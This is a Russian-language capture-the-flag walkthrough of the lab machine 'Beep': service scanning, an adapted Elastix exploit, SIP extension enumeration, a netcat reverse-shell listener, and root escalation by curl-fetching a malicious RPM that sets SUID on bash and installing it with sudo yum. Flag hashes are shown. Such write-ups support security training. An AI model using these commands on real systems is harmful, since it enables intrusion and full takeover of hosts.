Обзор сервисов
Машина имеет IP-адрес 10.10.10.7
. Посмотрим на вывод nmap
:
$ nmap -sV -sC -Pn -oN 10.10.10.7 10.10.10.7
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: USER IMPLEMENTATION(Cyrus POP3 server v2) TOP EXPIRE(NEVER) LOGIN-DELAY(0) AUTH-RESP-CODE RESP-CODES UIDL APOP PIPELINING STLS
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 875/udp status
|_ 100024 1 878/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: UIDPLUS LISTEXT OK URLAUTHA0001 STARTTLS X-NETSCAPE RENAME LIST-SUBSCRIBED ID SORT=MODSEQ CATENATE BINARY SORT ACL Completed NAMESPACE IMAP4rev1 IDLE CONDSTORE THREAD=REFERENCES MULTIAPPEND ANNOTATEMORE QUOTA THREAD=ORDEREDSUBJECT NO MAILBOX-REFERRALS LITERAL+ UNSELECT CHILDREN RIGHTS=kxte IMAP4 ATOMIC
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after: 2018-04-07T08:22:08
| MD5: 621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8
|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f
|_ssl-date: 2021-05-22T07:04:45+00:00; +2s from scanner time.
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 1s
Веб-сервис
На нас встречает Elastix.
Попробуем поискать эксплоит. Такой находится на https://www.exploit-db.com/exploits/18650, но для эксплуатации нам нужен существующее имя пользователя, а также выставление в /etc/ssl/openssl.conf
параметров minprotocol none
, cipherstring default
.
Поправим эксплоит:
import ssl
ctxt = ssl.create_default_context()
ctxt.check_hostname = False
ctxt.verify_mode = ssl.CERT_NONE
url = ...
urllib.urlopen(url, context=ctxt)
SIP-сканирование
Проведем сканирование SIP-расширений от 1 до 500.
$ svwar -m INVITE -e1-500 10.10.10.7
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233 | reqauth |
+-----------+----------------+
Поменяем в эксплоите extension
на 233
, rhost
на 10.10.10.7
, lhost
на 10.10.16.93
.
Запустим:
rlwrap nc -lnvp 443
python2 exp.py
Пользовательский флаг
find /home -name *user.txt*
/home/fanis/user.txt
cat /home/fanis/user.txt
d219362ccd047fb37287db33b240ab24
Повышение привилегий
$ sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG
LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
Мы можем запускать yum
с правами суперпользователя. Воспользуемся гайдом. Полезная нагрузка в файле payload.sh
:
#!/bin/bash
chmod u+s /bin/bash
Создадим RPM-пакет:
# на локальной машине
$ sudo gem install fpm
$ fpm -n root -s dir -t rpm -a all --before-install payload.sh .
Created package {:path=>"root-1.0-1.noarch.rpm"}
$ python3 -m http.server 4443
# на удаленной машине
$ curl http://10.10.16.93:4443/test/root-1.0-1.noarch.rpm -o root-1.0-1.noarch.rpm
$ sudo yum localinstall --disablerepo=* --nogpgcheck root-1.0-1.noarch.rpm
> yes
$ ls -la /bin/bash
-rwsr-xr-x 1 root root 729292 Jan 22 2009 /bin/bash
$ /bin/bash -p
$ id
uid=100(asterisk) gid=101(asterisk) euid=0(root)
Флаг суперпользователя
cd /root
ls -la
total 16308
drwxr-x--- 2 root root 4096 Jul 16 2019 .
drwxr-xr-x 22 root root 4096 Jul 29 22:51 ..
-rw------- 1 root root 6025 Apr 7 2017 anaconda-ks.cfg
-rw------- 1 root root 1186 Jul 29 21:52 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
-r-xr-xr-x 1 root root 190461 Aug 10 2011 elastix-pr-2.2-1.i386.rpm
-rw-r--r-- 1 root root 18433 Apr 7 2017 install.log
-rw-r--r-- 1 root root 0 Apr 7 2017 install.log.syslog
-rw-r--r-- 1 root root 1 Apr 7 2017 postnochroot
-rw------- 1 root root 33 Jul 29 18:16 root.txt
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
-r-xr-xr-x 1 root root 16358730 Oct 31 2011 webmin-1.570-1.noarch.rpm
cat root.txt
47977ff7e1438d8ceeffb77ccf002bf2